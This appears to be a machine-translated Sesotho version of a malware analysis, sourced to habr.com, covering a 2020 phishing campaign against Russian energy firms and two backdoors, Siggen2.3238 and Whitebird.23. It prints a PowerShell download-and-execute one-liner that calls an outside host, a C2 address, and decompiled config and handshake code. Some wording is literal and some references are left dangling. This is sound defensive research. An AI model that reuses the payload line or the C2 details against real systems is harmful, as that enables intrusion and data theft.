Phihlelo ea rona ea ho batlisisa liketsahalo tsa ts'ireletso ea k'homphieutha e bontša hore imeile e ntse e le e 'ngoe ea litsela tse tloaelehileng tse sebelisoang ke bahlaseli ho qala ho phunyeletsa mekhoa ea marang-rang e hlasetsoeng. Ketso e le 'ngoe e sa tsotelleng e nang le lengolo le belaetsang (kapa e seng e belaetsang) e fetoha sebaka sa ho kena bakeng sa ts'oaetso e eketsehileng, ke ka lebaka leo linokoane tsa marang-rang li sebelisang mekhoa ea boenjiniere ba sechaba ka mafolofolo, le hoja li na le katleho e fapaneng.
Ka poso ena re batla ho bua ka lipatlisiso tsa rona tsa morao-rao mabapi le lets'olo la spam le lebisitseng likhoebo tse 'maloa sebakeng sa mafura le matla a Russia. Litlhaselo tsohle li ile tsa latela boemo bo tšoanang ka li-imeile tsa bohata, 'me ho ne ho bonahala ho se motho ea entseng boiteko bo bongata litabeng tsa mangolo-tsoibila ana.
Tšebeletso ea Bohlale
Tsohle li qalile bofelong ba Mmesa 2020, ha bahlahlobisisi ba vaerase ea Websaete ba fumana lets'oao la spam leo ho lona linokoane li rometseng bukana e nchafalitsoeng ea mehala ho basebetsi ba likhoebo tse 'maloa sebakeng sa mafura le matla a Russia. Ha e le hantle, ena e ne e se pontšo e bonolo ea ho ameha, kaha bukana e ne e se ea sebele, 'me litokomane tsa .docx li ile tsa kopitsa litšoantšo tse peli ho tloha mehloling e hōle.
E 'ngoe ea tsona e jarollotsoe komporong ea mosebelisi ho tsoa litabeng[.]zannews[.]com seva. Hoa hlokomeleha hore domain name e tšoana le sebaka sa setsi sa litaba se khahlanong le bobolu sa Kazakhstan - zannews[.]kz. Ka lehlakoreng le leng, sebaka se sebelisitsoeng se ne se re hopotsa hang-hang phutuho e 'ngoe ea 2015 e tsejoang ka hore ke TOPNEWS, e neng e sebelisa ICEFOG backdoor mme e na le libaka tsa taolo ea Trojan tse nang le "litaba" tse ka tlaase ho mabitso a tsona. Ntho e 'ngoe e khahlisang e ne e le hore ha u romella mangolo-tsoibila ho baamoheli ba fapaneng, likopo tsa ho khoasolla setšoantšo li sebelisa liparamente tse fapaneng tsa kopo kapa mabitso a ikhethang a litšoantšo.
Re lumela hore sena se entsoe ka morero oa ho bokella tlhahisoleseling ho tsebahatsa motho ea ka tšeptjoang, ea neng a tla tiisetsoa hore o tla bula lengolo ka nako e nepahetseng. Protocol ea SMB e ne e sebelisetsoa ho kopitsa setšoantšo ho tswa ho seva sa bobeli, se ka etsoang ho bokella li-hashe tsa NetNTLM lik'homphieutha tsa basebetsi ba ileng ba bula tokomane e amoheloang.
Mona ke lengolo ka bolona le nang le fake directory:
Ka Phuptjane selemong sena, linokoane li ile tsa qala ho sebelisa domain name e ncha, sports[.]manhajnews[.]com, ho kenya litšoantšo. Litlhahlobo li bonts'itse hore li-subdomain tsa manhajnews[.]com li 'nile tsa sebelisoa ho melaetsa ea spam ho tloha bonyane ka Loetse 2019. E 'ngoe ea lipakane tsa phutuho ena e ne e le univesithi e kholo ea Russia.
Hape, ka June, bahlophisi ba tlhaselo eo ba ile ba tla le temana e ncha bakeng sa mangolo a bona: lekhetlong lena tokomane e ne e e-na le tlhahisoleseding e mabapi le tsoelo-pele ea indasteri. Mongolo oa lengolo o bontšitse ka ho hlaka hore mongoli oa lona e ne e se sebui sa Serussia, kapa o ne a iketsetsa maikutlo a joalo ka boomo ka eena. Ka bomalimabe, mehopolo ea nts'etsopele ea indasteri, joalo ka kamehla, e ile ea fetoha sekoaelo feela - tokomane e ile ea khoasolla litšoantšo tse peli, ha seva se fetotsoe ho khoasolla[.]inklingpaper[.]com.
Popontshwa e latelang e ile ya latela ka Phupu. E le ho leka ho qoba ho fumanoa ha litokomane tse mpe ka mananeo a antivirus, bahlaseli ba ile ba qala ho sebelisa litokomane tsa Microsoft Word tse kentsoeng ka password. Ka nako e ts'oanang, bahlaseli ba ile ba etsa qeto ea ho sebelisa mokhoa oa khale oa boenjiniere ba sechaba - tsebiso ea moputso.
Temana ea boipiletso e ile ea boela ea ngoloa ka mokhoa o tšoanang, e leng se ileng sa tsosa lipelaelo tse eketsehileng har’a ba neng ba bua. Seva ea ho khoasolla setšoantšo le eona ha ea fetoha.
Hlokomela hore maemong 'ohle, li-mailbox tsa elektronike tse ngolisitsoeng posong[.]ru le yandex[.]ru li ne li sebelisetsoa ho romela mangolo.
Tlhaselo
Mathoasong a Loetse 2020, e ne e le nako ea ho nka khato. Bahlahlobisisi ba rona ba kokoana-hloko ba ile ba tlaleha leqhubu le lecha la litlhaselo, moo bahlaseli ba ileng ba boela ba romela mangolo tlas'a boikaketsi ba ho ntlafatsa mohala oa thelefono. Leha ho le joalo, lekhetlong lena sephutheloana se ne se e-na le macro e kotsi.
Ha o bula tokomane e khomaretsoeng, macro e thehile lifaele tse peli:
- VBS script %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, e neng e reretsoe ho qala faele ea batch;
- Faele ea batch ka boeona %APPDATA%configstest.bat, e neng e sa hlaka.
Moko oa mosebetsi oa eona o theohela ho qala khetla ea Powershell ka li-parameter tse itseng. Litekanyetso tse fetiselitsoeng ho khetla li arotsoe ka litaelo:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Ka tsela e latelang ho tsoa ho litaelo tse hlahisitsoeng, sebaka seo ho lefshoang ho sona se jarollotsoeng se boetse se ipatile e le sebaka sa litaba. E bonolo , eo mosebetsi oa eona feela e leng ho amohela shellcode ho tsoa ho seva sa taelo le taolo le ho e phetha. Re khonne ho tseba mefuta e 'meli ea li-backdoors tse ka kenngoa ho PC ea mohlaseluoa.
Backdoor.Siggen2.3238
Ea pele ke Backdoor.Siggen2.3238 - litsebi tsa rona li ne li e-s'o kopane pele, 'me ho ne ho boetse ho se na moo ho buuoang ka lenaneo lena ke barekisi ba bang ba antivirus.
Lenaneo lena ke mokokotlo o ngotsoeng ka C++ 'me o sebetsa ho lisebelisoa tsa Windows tse 32-bit.
Backdoor.Siggen2.3238 e khona ho buisana le seva sa tsamaiso e sebelisa liprothokholo tse peli: HTTP le HTTPS. Mohlala o lekiloeng o sebelisa protocol ea HTTPS. Moemeli ea latelang oa Mosebelisi o sebelisoa likopong tse eang ho seva:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
Tabeng ena, likopo tsohle li fanoa ka sete e latelang ea li-parameter:
%s;type=%s;length=%s;realdata=%send
moo mola o mong le o mong %s o nkeloang sebaka ke:
- ID ea komporo e tšoaelitsoeng,
- mofuta oa kopo e rometsoeng,
- bolelele ba data tšimong ea realdata,
- data.
Sethaleng sa ho bokella tlhahisoleseling mabapi le sistimi e tšoaelitsoeng, ntlo e ka morao e hlahisa mohala o kang:
lan=%s;cmpname=%s;username=%s;version=%s;
moo lan e leng aterese ea IP ea komporo e tšoaelitsoeng, cmpname ke lebitso la komporo, lebitso la mosebelisi ke lebitso la mosebelisi, mofuta oa 0.0.4.03.
Lintlha tsena tse nang le sekhetho sa sysinfo li romelloa ka kopo ea POST ho seva sa taolo se fumanehang ho https[:]//31.214[.]157.14/log.txt. Haeba ka karabo Backdoor.Siggen2.3238 e amohela lets'oao la HEART, khokahano e nkuoa e atlehile, 'me ntlo e ka morao e qala potoloho e kholo ea puisano le seva.
Tlhaloso e feletseng ea melao-motheo ea ts'ebetso Backdoor.Siggen2.3238 ke ea rona .
BackDoor.Whitebird.23
Lenaneo la bobeli ke phetoho ea BackDoor.Whitebird backdoor, eo re seng re ntse re e tseba ho tloha ketsahalong ena le lefapha la mmuso la Kazakhstan. Phetolelo ena e ngotsoe ka C++ 'me e etselitsoe ho sebetsa ho li-system tsa Windows tse 32-bit le 64-bit.
Joalo ka mananeo a mangata a mofuta ona, BackDoor.Whitebird.23 e etselitsoeng ho theha khokahano e patiloeng le seva sa taolo le taolo e sa lumelloeng ea komporo e tšoaelitsoeng. E kentsoe ka har'a sistimi e sekiselitsoeng e sebelisa dropper .
Mohlala oo re o hlahlobileng e ne e le laebrari e mpe e nang le thepa e 'meli e romelloang kantle ho naha:
- Google Play
- Teko.
Qalong ea mosebetsi oa eona, e hlakola tlhophiso e thata ka har'a 'mele o ka morao e sebelisa algorithm e thehiloeng ts'ebetsong ea XOR ka byte 0x99. Sebopeho se shebahala tjena:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Ho etsa bonnete ba hore ts'ebetso ea eona e sa khaotse, backdoor e fetola boleng bo boletsoeng tšimong lihora_ tsa ho sebetsa tlhophiso. Tšimo e na le li-byte tse 1440, tse nkang boleng 0 kapa 1 mme li emela motsotso o mong le o mong oa hora ka letsatsi. E theha khoele e arohaneng bakeng sa sebopeho se seng le se seng sa marang-rang se mamelang sebopeho mme se sheba lipakete tsa tumello ho seva sa proxy ho tsoa komporong e tšoaelitsoeng. Ha pakete e joalo e fumanoa, ntlo e ka morao e eketsa tlhahisoleseding e mabapi le seva sa proxy lethathamong la eona. Ho phaella moo, hlahloba boteng ba proxy ka WinAPI InternetQueryOptionW.
Lenaneo le hlahloba motsotso le hora ea hona joale ebe le e bapisa le data e tšimong lihora_ tsa ho sebetsa tlhophiso. Haeba boleng ba motsotso o tsamaellanang oa letsatsi ha se zero, joale khokahano e thehiloe le seva sa taolo.
Ho theha khokahanyo ho seva ho etsisa ho theoa ha khokahano ho sebelisoa protocol ea TLS version 1.0 lipakeng tsa moreki le seva. 'Mele oa kamore e ka morao o na le li-buffers tse peli.
Buffer ea pele e na le pakete ea TLS 1.0 Client Hello.
Buffer ea bobeli e na le lipakete tsa TLS 1.0 Client Key Exchange tse nang le senotlolo sa bolelele ba 0x100 byte, Change Cipher Spec, Encrypted Handshake Message.
Ha o romela sephutheloana sa Client Hello, kamore e ka morao e ngola li-byte tse 4 tsa nako ea hajoale le li-byte tse 28 tsa data ea pseudo-random lebaleng la Client Random, e baloang ka tsela e latelang:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Pakete e amoheloang e romelloa ho seva sa taolo. Karabo (pakete ea Hello ea Seva) e hlahloba:
- ho lumellana le TLS protocol version 1.0;
- ngollano ea setempe sa nako (li-byte tsa pele tse 4 tsa lebala la pakete ea Random Data) e boletsoeng ke moreki ho setempe sa linako se boletsoeng ke seva;
- papali ea li-byte tse 4 tsa pele ka mor'a setempe sa nako sebakeng sa Random Data sa moreki le seva.
Haeba ho na le lipapali tse boletsoeng, kamore e ka morao e lokisa pakete ea Client Key Exchange. Ho etsa sena, e fetola Senotlolo sa Sechaba ka har'a sephutheloana sa Client Key Exchange, hammoho le Encryption IV le Data Encryption ka har'a sephutheloana sa Molaetsa oa Encrypted Handshake.
Ka mor'a moo o fumana pakete ho tswa ho seva sa taelo le taolo, ho hlahloba hore na TLS protocol version ke 1.0, ebe e amohela li-byte tse ling tse 54 ('mele oa pakete). Sena se phethela ho seta khokahano.
Tlhaloso e feletseng ea melao-motheo ea ts'ebetso BackDoor.Whitebird.23 ke ea rona .
Qetello le Liqeto
Tlhahlobo ea litokomane, malware, le lisebelisoa tsa motheo tse sebelisoang li re lumella ho bua ka kholiseho hore tlhaselo e lokiselitsoe ke e 'ngoe ea lihlopha tsa Chaena tsa APT. Ha re nahana ka ts'ebetso ea li-backdoors tse kenngoa lik'homphieutha tsa bahlaseluoa ha ho e-na le tlhaselo e atlehileng, tšoaetso e lebisa, bonyane, ho utsoa boitsebiso ba lekunutu bo tsoang lik'homphieutha tsa mekhatlo e hlasetsoeng.
Ho phaella moo, boemo bo ka 'nang ba etsahala ke ho kenya Trojan e khethehileng ho li-server tsa lehae tse nang le mosebetsi o khethehileng. Tsena e ka ba balaoli ba li-domain, li-server tsa poso, li-gateways tsa Inthanete, joalo-joalo. Joalokaha re bona mohlaleng , li-server tse joalo li khahla haholo bahlaseli ka mabaka a fapaneng.
Source: www.habr.com